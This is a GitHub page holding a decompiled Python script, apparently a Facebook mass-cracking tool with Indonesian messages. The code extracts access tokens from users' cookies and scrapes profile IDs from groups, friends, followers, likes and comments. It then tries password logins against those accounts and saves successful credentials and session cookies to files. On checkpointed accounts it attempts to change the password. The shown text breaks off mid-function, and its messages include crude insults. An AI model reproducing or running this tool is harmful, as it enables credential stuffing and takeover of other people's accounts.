forked from ShankarXD/DECOMPILED-XD
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathymbf_dec.py
1205 lines (1163 loc) · 63.7 KB
/
ymbf_dec.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
# Decompile by KangEhem:)
# Time Succes decompile : 2022-01-03 20:23:30.605555
import os
try:
import requests
except ImportError:
print('\n [×] Modul requests belum terinstall!...\n')
os.system('pip install requests')
try:
import concurrent.futures
except ImportError:
print('\n [×] Modul Futures belum terinstall!...\n')
os.system('pip install futures')
try:
import bs4
except ImportError:
print('\n [×] Modul Bs4 belum terinstall!...\n')
os.system('pip install bs4')
import requests, os, re, bs4, sys, json, time, random, datetime, subprocess
from concurrent.futures import ThreadPoolExecutor as YayanGanteng
from datetime import datetime
from bs4 import BeautifulSoup
ct = datetime.now()
n = ct.month
bulan = ['Januari', 'Februari', 'Maret', 'April', 'Mei', 'Juni', 'Juli', 'Agustus', 'September', 'Oktober', 'November', 'Desember']
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = bulan[nTemp]
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m' # WARNA MATI
my_color = [
P, M, H, K, B, U, O, N]
warna = random.choice(my_color)
data,data2={},{}
aman,cp,salah=0,0,0
ubahP,pwBaru=[],[]
ok,cp,id,loop = [],[],[],0
url_lookup = "https://lookup-id.com/"
url_mb = "https://mbasic.facebook.com"
header_grup = {"user-agent": "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"}
bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
bulan_key = {"january": "January", "february": "February", "march": "March", "april": "April", "may": "May", "june": "June", "july": "July", "august": "August", "september": "September", "october": "October", "november": "November", "december": "December"}
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def logo():
print("""%s
_____.___. _____ _____________________
\__ | | / \\______ \_ _____/ ®
/ | | ______ / \ / \| | _/| __)
\____ | /_____/ / Y \ | \| \
/ ______| \____|__ /______ /\___ /
\/ \/ \/ \/ """%(N))
def hasil(ok,cp):
if len(ok) != 0 or len(cp) != 0:
print('\n\n %s[%s#%s] crack selesai...\n'%(N,K,N))
print(' [%s+%s] total OK : %s%s%s'%(O,N,H,str(len(ok)),N))
print(' [%s+%s] total CP : %s%s%s'%(O,N,K,str(len(cp)),N))
cek_cp = input(f"\n [{O}?{N}] munculkan opsi checkpoint detedtor [Y/t]: ")
if cek_cp =="":
print(f"\n [{M}!{N}] jangan kosong");hasil(ok,cp)
elif cek_cp in["Y","y"]:
jalan(f" [{M}!{N}] hidupkan mode pesawat 3 detik terlebih dahulu.");time.sleep(5)
ww=input(f"\n [{O}?{N}] ubah password ketika tap yes [Y/t]: ")
if ww in ("Y","y","ya"):
ubahP.append("y")
print(f" [{H}•{N}] contoh password : {H}yayanxd{N}")
pwBar=input(f"\n [{H}+{N}] masukan password baru : ")
print("\n")
if len(pwBar) <= 5:
print('\n %s[%s×%s] kata sandi minimal 6 karakter'%(N,M,N))
else:
pwBaru.append(pwBar)
for memek in cp:
kontol = memek.replace('\n', '')
titid = kontol.split('|')
jalan(f' {N}[{M}>{N}] mencoba login ke akun : {K}{kontol.replace(" [×] ", "")}{N}')
try:
log_hasil(titid[0].replace(" [×] ", ""), titid[1])
except requests.exceptions.ConnectionError:
continue
print("")
print("")
print(' [ %sProses Pengecekan Selesai %s]\n'%(H,N))
input(' [ %sKEMBALI%s ] '%(O,N));moch_yayan()
elif cek_cp in["T","t"]:
exit(f"\n {O}*{N} Selamat tinggal:)")
else:
print(f"\n [{M}!{N}] Y/t goblok");hasil(ok,cp)
else:
print('\n\n [%s!%s] opshh kamu tidak mendapatkan hasil :('%(M,N));exit()
def yayanxd():
os.system('clear')
print (' %s*%s tools ini menggunakan login cookies facebook.\n %s*%s apakah kamu sudah tau cara mendapatkan cookies facebook?\n %s*%s ketik open untuk mendapatkan cookies'%(O,N,O,N,O,N))
cookie = input("\n %s[%s?%s] Cookies : %s"% (N,K,N,O))
if cookie in['OPEN','Open','open']:
jalan("\n %s* %sanda akan di arahkan ke YouTube"%(O,H));time.sleep(3);os.system('xdg-open https://youtu.be/DF7bUCn0GFY');yayanxd()
try:
head={'Host':'business.facebook.com','cache-control':'max-age=0','upgrade-insecure-requests':'1','user-agent':'Mozilla/5.0 (Linux; Android 6.0.1; Redmi 4A Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.92 Mobile Safari/537.36','accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','content-type' : 'text/html; charset=utf-8','accept-encoding':'gzip, deflate','accept-language':'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7','cookie': cookie}
asww=requests.get("https://business.facebook.com/creatorstudio/home", headers=head)
reqq=re.search('{"accessToken":"(EAA\w+)', asww.text)
tokn=reqq.group(1)
open('.cokie.txt', 'a').write(cookie)
open('.token.txt', 'a').write(tokn)
nama = requests.get('https://graph.facebook.com/me?access_token=%s'%(tokn)).json()['name']
print('\n\n %s*%s selamat datang %s%s%s'%(O,N,K,nama,N));time.sleep(2)
print(' %s*%s mohon untuk menggunakan sc ini sewajarnya, kami tidak bertanggung jawab jika sc ini disalah gunakan...'%(O,N));time.sleep(2)
input(' %s*%s tekan enter '%(O,N))
os.system('xdg-open https://youtube.com/channel/UCNvDaXoyAVCNJbSqtaXA-mg')
moch_yayan()
except AttributeError:
print('\n %s[%s×%s] cookies invalid'%(N,M,N));time.sleep(1);yayanxd()
except UnboundLocalError:
print('\n %s[%s×%s] cookies invalid'%(N,M,N));time.sleep(1);yayanxd()
except requests.exceptions.ConnectionError:
exit('\n\n %s[%s!%s] tidak ada koneksi\n'%(N,M,N))
def moch_yayan():
os.system('clear')
logo()
try:
kontol = open('.token.txt', 'r').read()
except IOError:
print('\n %s[%s×%s] cookie invalid'%(N,M,N));time.sleep(2);os.system('rm -rf .token.txt');os.system('rm -rf .cokie.txt');yayanxd()
try:
nama = requests.get('https://graph.facebook.com/me?access_token=%s'%(kontol)).json()['name']
except KeyError:
print('\n %s[%s×%s] cookie invalid'%(N,M,N));time.sleep(2);os.system('rm -rf .token.txt');os.system('rm -rf .cokie.txt');yayanxd()
IP = requests.get('https://yayanxd.my.id/server/ip').text
email = ("[email protected]")
print("\n [*] Email : %s"%(email));time.sleep(0.03)
print(" [*] ---------------------------------------------");time.sleep(0.03)
print(" [*] Premium : ")
print(" [*] Kadaluarsa : ")
print(" [*] ---------------------------------------------");time.sleep(0.03)
print(" [*] IP : %s\n"%(IP));time.sleep(0.03)
print(" [ selamat datang %s%s%s ]\n"%(K,nama,N));time.sleep(0.03)
print(' [%s01%s]. Crack id dari anggota grup'%(O,N));time.sleep(0.03)
print(' [%s02%s]. Crack id dari teman publik'%(O,N));time.sleep(0.03)
print(' [%s03%s]. Crack id dari total followers'%(O,N));time.sleep(0.03)
print(' [%s04%s]. Crack id dari like postingan'%(O,N));time.sleep(0.03)
print(' [%s05%s]. Crack id dari random id massal'%(O,N));time.sleep(0.03)
print(' [%s06%s]. Crack id dari komentar postingan'%(O,N));time.sleep(0.03)
print(' [%s07%s]. Crack akun instagram [%snew%s]'%(O,N,H,N));time.sleep(0.03)
print(' [%s08%s]. Checkpoint detedtor'%(O,N));time.sleep(0.03)
print(' [%s09%s]. Settings user agent'%(O,N));time.sleep(0.03)
print(' [%s10%s]. Check hasil crack'%(O,N));time.sleep(0.03)
print(' [%s00%s]. logout (%shapus cookie%s)'%(M,N,M,N));time.sleep(0.03)
pepek = input('\n [%s*%s] menu : '%(H,N))
if pepek == '':
print('\n %s[%s×%s] jangan kosong kentod!'%(N,M,N));time.sleep(2);moch_yayan()
elif pepek in['1','01']:
kontol = input(f"{N} [?] masukkan id grup : ")
if kontol in[""," "]:
print('\n %s[%s×%s] jangan kosong kentod!'%(N,M,N));time.sleep(2);moch_yayan()
else:
try:
ajg=requests.get(f"https://mbasic.facebook.com/browse/group/members/?id={kontol}",cookies=kueh).text
if "Halaman Tidak Ditemukan" in ajg:
print(f"\n %s[%s×%s] group dengan id {kontol} tidak ditemukan"%(N,M,N));time.sleep(2);moch_yayan()
elif "Anda Tidak Dapat Menggunakan Fitur Ini Sekarang" in ajg:
print("\n %s[%s×%s] facebook membatasi setiap aktivitas, limit bro, silahkan beralih akun"%(N,M,N));time.sleep(2);moch_yayan()
elif "Konten Tidak Ditemukan" in ajg:
print(f"\n %s[%s×%s] group dengan id {kontol} tidak ditemukan"%(N,M,N));time.sleep(2);moch_yayan()
else:
print(" [*] nama grup : "+re.findall("\<title\>(.*?)<\/title\>",ajg)[0][8:])
print("\n [!] untuk berhenti tekan CTRL lalu tekan c di keyboard anda.")
crack_grup(f"https://mbasic.facebook.com/browse/group/members/?id={kontol}")
except(requests.exceptions.ConnectionError,requests.exceptions.ChunkedEncodingError,requests.exceptions.ReadTimeout):
exit("\n [!] Kesalahan Pada Koneksi")
elif pepek in['2','02']:
try:
print("\n [*] Ketik 'me' jika ingin crack dari daftar teman")
user = input(' [*] masukan id atau username : ')
_memek_ = __convert__(user)
for a in requests.get('https://graph.facebook.com/%s/friends?limit=5000&access_token=%s'%(_memek_.get('_kontol_'),kontol)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
except KeyError:
print('\n %s[%s×%s] gagal mengambil id, kemungkinan id tidaklah publik'%(N,M,N));time.sleep(3);moch_yayan()
elif pepek in['3','03']:
kontol = input(f"{N} [?] masukan id atau username followers : ")
if kontol in[""," "]:
print('\n %s[%s×%s] jangan kosong kentod!'%(N,M,N));time.sleep(2);moch_yayan()
try:
print("\n [!] untuk berhenti tekan CTRL lalu tekan c di keyboard anda.")
followers(f"https://mbasic.facebook.com/subscribe/lists/?id={kontol}")
except KeyError:
print(f"\n [!] Why {kontol} mikir dong tolol, masukin id postingan yang bener ngentod");time.sleep(2);moch_yayan()
elif pepek in['4','04']:
kontol = input(f"{N} [?] masukan id postingan : ")
if kontol in[""," "]:
print('\n %s[%s×%s] jangan kosong kentod!'%(N,M,N));time.sleep(2);moch_yayan()
try:
print("\n [!] untuk berhenti tekan CTRL lalu tekan c di keyboard anda.")
like_post(f"https://mbasic.facebook.com/ufi/reaction/profile/browser/?ft_ent_identifier={kontol}")
except KeyError:
print(f"\n [!] Why {kontol} mikir dong tolol, masukin id postingan yang bener ngentod");time.sleep(2);moch_yayan()
elif pepek in['5','05']:
_ngocok_(kontol)
elif pepek in['6','06']:
kontol = input(f"{N} [?] masukan id postingan : ")
if kontol in[""," "]:
print('\n %s[%s×%s] jangan kosong kentod!'%(N,M,N));time.sleep(2);moch_yayan()
try:
print("\n [!] untuk berhenti tekan CTRL lalu tekan c di keyboard anda.")
ngomen_post(f"https://mbasic.facebook.com/{kontol}")
except KeyError:
print(f"\n [!] Why {kontol} mikir dong tolol, masukin id postingan yang bener ngentod");time.sleep(2);moch_yayan()
elif pepek in['7','07']:
log_igeh()
menu_igeh()
elif pepek in['8','08']:
gabut()
elif pepek in['9','09']:
seting_yntkts()
elif pepek in['10']:
dirs = os.listdir("results")
print('\n [ hasil crack yang tersimpan di file anda ]\n')
for file in dirs:
print(" [%s+%s] %s"%(O,N,file))
file = input("\n [%s?%s] masukan nama file :%s "%(M,N,H))
if file == "":
file = input("\n %s[%s?%s] masukan nama file :%s %s"%(N,M,N,H,N))
total = open("results/%s"%(file)).read().splitlines()
print(" %s[%s#%s] --------------------------------------------"%(N,O,N));time.sleep(2)
nm_file = ("%s"%(file)).replace("-", " ")
hps_nm = nm_file.replace(".txt", "").replace("OK", "").replace("CP", "").replace("cp_detektor", "").replace("invalid_ok", "")
jalan(" [%s*%s] Hasil %scrack%s pada tanggal %s:%s%s%s total %s: %s%s%s"%(M,N,O,N,M,O,hps_nm,N,M,O,len(total),O))
print(" %s[%s#%s] --------------------------------------------"%(N,O,N));time.sleep(2)
for memek in total:
kontol = memek.replace("\n","")
titid = kontol.replace(" [✓] "," \x1b[0m[\x1b[1;92m✓\x1b[0m]\x1b[1;92m ").replace(" [×] ", " \x1b[0m[\x1b[1;93m×\x1b[0m]\x1b[1;93m ")
print("%s%s"%(titid,N));time.sleep(0.03)
print(" %s[%s#%s] --------------------------------------------"%(N,O,N))
input('\n [ %sKEMBALI%s ] '%(O,N));moch_yayan()
elif pepek in['0','00']:
print("")
titik = ['\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ','\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ']
for x in titik:
sys.stdout.write('\r %s[%s+%s] menghapus cookie %s'%(N,M,N,x)); sys.stdout.flush()
time.sleep(1)
os.system('rm -rf .token.txt');os.system('rm -rf .cokie.txt')
exit('\n %s[%s✓%s]%s berhasil menghapus cookie'%(N,M,N,H))
else:
print('\n %s[%s×%s] menu [%s%s%s] tidak ada, cek menu nya bro!'%(N,M,N,M,pepek,N));time.sleep(2);moch_yayan()
if len(id)!=0:
print("")
return __crack__().plerr(id)
else:
print("\n %s[%s×%s] gagal mengambil id, silahkan coba lagi"%(N,M,N));time.sleep(2);moch_yayan()
def seting_yntkts():
print('\n (%s1%s) ganti user agent'%(O,N))
print(' (%s2%s) check user agent'%(O,N))
ytbjts = input('\n %s[%s?%s] choose : '%(N,O,N))
if ytbjts == '':
print('\n %s[%s×%s] Gak boleh kosong Kentod'%(N,M,N));time.sleep(2);seting_yntkts()
elif ytbjts in['1','01']:
yo_ndak_tau_ko_tanya_saia()
elif ytbjts in['2','02']:
try:
user_agent = open('YNTKTS.txt', 'r').read()
except IOError:
user_agent = '%s-'%(M)
print('\n %s[%s+%s] User Agent anda : %s%s'%(N,O,N,H,user_agent))
input('\n %s[ %skembali%s ]'%(N,O,N));moch_yayan()
else:
print('\n %s[%s×%s] input yang bener'%(N,M,N));time.sleep(2);seting_yntkts()
def yo_ndak_tau_ko_tanya_saia():
os.system('rm -rf YNTKTS.txt')
_asu_ = input('\n [%s?%s] ingin menggunakan user agent hp anda [Y/t]: '%(O,N))
if _asu_ == '':
print('\n %s[%s×%s] Gak boleh kosong Kentod'%(N,M,N));yo_ndak_tau_ko_tanya_saia()
elif _asu_ in['Y','y']:
jalan('\n %s *%s anda akan di arakan ke situs web setelah di arahkan ke situs web.\n %s*%s klik ikon %sMY USER AGENT%s lalu copy semua user agent anda...'%(O,N,O,N,H,N));time.sleep(2);os.system('xdg-open https://www.yayanxd.my.id/server')
_agen_ = input(' [%s?%s] masukan user agent hp anda :%s '%(O,N,H))
open('YNTKTS.txt', 'w').write(_agen_);time.sleep(2)
jalan('\n %s[%s✓%s] berhasil menggunakan user agent hp anda...'%(N,H,N))
input('\n %s[ %skembali%s ]'%(N,O,N));moch_yayan()
elif _asu_ in['T','t']:
_agen_ = input(' [%s?%s] masukan user agent :%s '%(O,N,H))
open('YNTKTS.txt', 'w').write(_agen_);time.sleep(2)
jalan('\n %s[%s✓%s] berhasil mengganti user agent...'%(N,H,N))
input('\n %s[ %skembali%s ]'%(N,O,N));moch_yayan()
else:
print('\n %s[%s!%s] Y/t ngentod'%(N,M,N));yo_ndak_tau_ko_tanya_saia()
def crack_grup(hencet):
try:
_mmk_ = open('.cokie.txt').read()
kueh = {"cookie":_mmk_}
kontol=requests.get(hencet,cookies=kueh).text
memek=re.findall('\<h3\>\<a\ class\=\"..\"\ href\=\"\/(.*?)\"\>(.*?)<\/a\>',kontol)
for softek in memek:
if "profile.php?" in softek[0]:
id.append(re.findall("id=(.*)",softek[0])[0]+"<=>"+softek[1])
else:
id.append(softek[0]+"<=>"+softek[1])
sys.stdout.write('\r [*] sedang mengumpulkan %s id... '%(len(id))); sys.stdout.flush()
if "Lihat Selengkapnya" in kontol:
crack_grup(url_mb+BeautifulSoup(kontol,"html.parser").find("a",string="Lihat Selengkapnya").get("href"))
else:
def geh(gey):
a=requests.get(gey,cookies=kueh).text
b=re.findall('\<h3\ class\=\".*?">\<span>\<strong>\<a\ href\=\"/(.*?)\">(.*?)</a\>\</strong\>',a)
if len(b)!=0:
for c in b:
if "profile.php" in c[0]:
d=re.search("profile.php\?id=(\\d*)",c[0]).group(1)
if d in id:
continue
else:
id.append(d+"<=>"+c[1])
else:
d=re.search("(.*?)\?refid",c[0]).group(1)
if d in id:
continue
else:
id.append(d+"<=>"+c[1])
sys.stdout.write('\r [*] sedang mengumpulkan %s id... '%(len(id))); sys.stdout.flush()
if "Lihat Postingan Lainnya" in a:
geh(url_mb+BeautifulSoup(a,"html.parser").find("a",string="Lihat Postingan Lainnya").get("href"))
geh(f"{url_mb}/groups/"+re.search("id=(\\d*)",hencet).group(1))
except:pass
def like_post(hencet):
try:
_mmk_ = open('.cokie.txt').read()
kueh = {"cookie":_mmk_}
kontol=requests.get(hencet,cookies=kueh).text
if "Semua 0" in kontol:
print("\n [!] Tidak ada yang menanggapi postingan, awokawokawok kasian akun nya sepi:v");time.sleep(2);moch_yayan()
else:
memek=re.findall('\<h3\ class\=\".."\>\<a\ href\=\"(.*?)"\>(.*?)<\/a\>',kontol)
for softek in memek:
if "profile.php?" in softek[0]:
id.append(re.findall("id=(.*)",softek[0])[0]+"<=>"+softek[1])
else:
id.append(re.findall("/(.*)",softek[0])[0]+"<=>"+softek[1])
sys.stdout.write('\r [*] sedang mengumpulkan %s id... '%(len(id))); sys.stdout.flush()
if "Lihat Selengkapnya" in kontol:
like_post(url_mb+BeautifulSoup(kontol,"html.parser").find("a",string="Lihat Selengkapnya").get("href"))
except:pass
def followers(hencet):
try:
_mmk_ = open('.cokie.txt').read()
kueh = {"cookie":_mmk_}
kontol=requests.get(hencet,cookies=kueh).text
memek = BeautifulSoup(kontol,'html.parser')
for mmk in memek.find_all('a',href=True):
if "profile.php" in mmk.get('href'):
bb = mmk.text
xd = "".join(bs4.re.findall("profile\.php\?id=(.*?)&",mmk.get("href")))
id.append(bb+'<=>'+xd+'\n')
sys.stdout.write('\r [*] sedang mengumpulkan %s id... '%(len(id))); sys.stdout.flush()
for asu in memek.find_all('a',href=True):
if 'Lihat Selengkapnya' in asu.text:
followers("https://mbasic.facebook.com/subscribe/lists/?id="+asu.get("href"))
except:pass
def ngomen_post(hencet):
try:
_mmk_ = open('.cokie.txt').read()
kueh = {"cookie":_mmk_}
kontol= requests.get(hencet,cookies=kueh,headers=header_grup).text.encode("utf-8")
memek = BeautifulSoup(kontol,'html.parser')
for mmk in memek.find_all('h3'):
for _id_ in mmk.find_all('a',href=True):
if "profile.php" in _id_.get("href"):
xz = _id_.get("href").split('=')[1]
bb = xz.split('&')[0]
xd = _id_.text
id.append(bb+'<=>'+xd+'\n')
else:
xz = _id_.get("href").split('?')[0]
bb = xz.split('/')[1]
xd = _id_.text
id.append(bb+'<=>'+xd+'\n')
sys.stdout.write('\r [*] sedang mengumpulkan %s id... '%(len(id))); sys.stdout.flush()
for asu in memek.find_all("a",href=True):
if "Lihat komentar lainnya…" in asu.text:
ngomen_post("https://mbasic.facebook.com/"+asu.get("href"))
except:pass
def _ngocok_(__ppk__):
try:
nanya_keun = int(input('\n [%s?%s] masukan jumblah target : '%(M,N)))
except:nanya_keun=1
print(" [%s*%s] Ketik 'me' jika ingin crack dari daftar teman\n"%(O,N))
for mnh in range(nanya_keun):
mnh +=1
user = input(' [%s*%s] masukan id atau username %s%s%s : '%(O,N,H,mnh,N))
_memek_ = __convert__(user)
try:
for a in requests.get('https://graph.facebook.com/%s/friends?limit=5000&access_token=%s'%(_memek_.get('_kontol_'),__ppk__)).json()["data"]:
uid = a["id"]
nama = a["name"]
id.append(uid+"<=>"+nama)
except (KeyError,IOError):
print('\n [×] gagal mengambil id, kemungkinan id tidaklah publik');time.sleep(3);moch_yayan()
def __convert__(user):
if user == "me":
return {"_kontol_":user}
else:
payload = {"fburl": "https://free.facebook.com/{}".format(user), "check": "Lookup"}
if "facebook" in user:
payload = {"fburl": user, "check": "Lookup"}
mmk = requests.post(url_lookup, data=payload).content
xxx = BeautifulSoup(mmk, "html.parser")
idt = xxx.find("span", id="code")
asw = idt.text
return {"_kontol_":asw}
def gabut():
dirs = os.listdir("results")
print('\n [ hasil crack yang tersimpan di file anda ]\n')
for file in dirs:
print(" [%s+%s] %s"%(O,N,file))
jalan(f" [{M}×{N}] sebelum memasukan file,hidupkan mode pesawat 3 detik.");time.sleep(5)
files = input("\n [%s?%s] masukan nama file : %s"%(M,N,H))
try:
buka_baju = open(f'results/{files}','r').readlines()
except IOError:
print('\n [!] file tidak ada');time.sleep(2);moch_yayan()
ww=input(f"\n {N}[{O}?{N}] ubah password ketika tap yes [Y/t]: ")
if ww in ("Y","y","ya"):
ubahP.append("y")
print(f" [{H}•{N}] contoh password : {H}yayanxd{N}")
pwBar=input(f"\n [{H}+{N}] masukan password baru : ")
if len(pwBar) <= 5:
print('\n %s[%s×%s] kata sandi minimal 6 karakter'%(N,M,N))
else:
pwBaru.append(pwBar)
print('%s [%s*%s] Total %s%s%s Akun'%(N,O,N,K,str(len(buka_baju)),N))
jalan(" %s[%s#%s] --------------------------------------------"%(N,O,N))
for memek in buka_baju:
kontol = memek.replace('\n', '')
titid = kontol.split('|')
jalan(f' {N}[{M}>{N}] mencoba login ke akun : {K}{kontol.replace(" [×] ", "")}{N}')
try:
log_hasil(titid[0].replace(" [×] ", ""), titid[1])
except requests.exceptions.ConnectionError:
continue
print("")
print("")
print(' [ %sProses Pengecekan Selesai %s]\n'%(H,N))
input(' [ %sKEMBALI%s ] '%(O,N));os.system(f"rm -rf {buka_baju}");moch_yayan()
def log_hasil(user, pasw):
global aman,cp,salah
session=requests.Session()
session.headers.update({
"Host":"mbasic.facebook.com",
"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding":"gzip, deflate",
"accept-language":"id-ID,id;q=0.9",
"referer":"https://mbasic.facebook.com/",
"user-agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"
})
soup=BeautifulSoup(session.get(url_mb+"/login/?next&ref=dbl&fl&refid=8").text,"html.parser")
link=soup.find("form",{"method":"post"})
for x in soup("input"):
data.update({x.get("name"):x.get("value")})
data.update({"email":user,"pass":pasw})
urlPost=session.post("https://mbasic.facebook.com"+link.get("action"),data=data)
response=BeautifulSoup(urlPost.text, "html.parser")
if "Temukan Akun Anda" in re.findall("\<title>(.*?)<\/title>",str(urlPost.text)):
sys.stdout.write('\r %s[%s!%s] Hidupkan mode pesawat 2 detik '%(N,M,N)),
if "c_user" in session.cookies.get_dict():
if "Akun Anda Dikunci" in urlPost.text:
print(f"\r {N}[{M}×{N}] akun sesi new")
else:
coki = (";").join([ "%s=%s" % (key, value) for key, value in session.cookies.get_dict().items() ])
open('results/OKE.txt', 'a').write(f" [✓] {user}|{pasw}|{coki}\n")
print(f"\r 🎉{H} hore akunya tidak checkpoint{N}");jalan(f"\r {O}*{H} tunggu sebentar sedang mengecek aplikasi...{N}");time.sleep(0.03)
cek_apk(session,coki)
elif "checkpoint" in session.cookies.get_dict():
title=re.findall("\<title>(.*?)<\/title>",str(response))
link2=response.find("form",{"method":"post"})
listInput=['fb_dtsg','jazoest','checkpoint_data','submit[Continue]','nh']
for x in response("input"):
if x.get("name") in listInput:
data2.update({x.get("name"):x.get("value")})
an=session.post(url_mb+link2.get("action"),data=data2)
response2=BeautifulSoup(an.text,"html.parser")
number=0
cek=[cek.text for cek in response2.find_all("option")]
if(len(cek)==0):
if "Lihat detail login yang ditampilkan. Ini Anda?" in title:
if "y" in ubahP:
mmk = pwBaru
print(f"\r 🎉{H} hore akunya tap yes{N}");jalan(f"\r {O}*{H} tunggu sebentar sedang mengubah password dan mengecek aplikasi...{N}");time.sleep(0.03)
ubah_pw(session,response,link2,user, mmk)
else:
mmk = "YayanGanteng:v"
print(f"\r 🎉{H} hore akunya tap yes{N}");jalan(f"\r {O}*{H} tunggu sebentar sedang mengubah password dan mengecek aplikasi...{N}");time.sleep(0.03)
ubah_pw(session,response,link2,user, mmk)
elif "Masukkan Kode Masuk untuk Melanjutkan" in re.findall("\<title>(.*?)<\/title>",str(response)):
print(' [%s!%s] opshh akunya terpasang autentikasi dua faktor :('%(M,N))
else:
open('results/ERROR.txt', 'a').write(f" [×] {user}|{pasw}\n")
print(f" {N}[{M}!{N}] Error")
else:
open(f'results/CP-DETEKTOR-{ha}-{op}-{ta}.txt', 'a').write(f" [×] {user}|{pasw}\n")
print(" %s[%s*%s] Terdapat %s Opsi "%(N,O,N,len(cek)))
for opt in range(len(cek)):
print(f" [\x1b[1;92m{str(opt+1)}\x1b[0m] "+cek[opt])
else:
print(f"\r {N}[{M}!{N}] Kata sandi salah atau sudah diubah")
open('results/INVALID-OK.txt', 'a').write(f" [×] {user}|{pasw}\n")
def ubah_pw(session,response,link2,user,mmk):
dat,dat2={},{}
but=["submit[Yes]","nh","fb_dtsg","jazoest","checkpoint_data"]
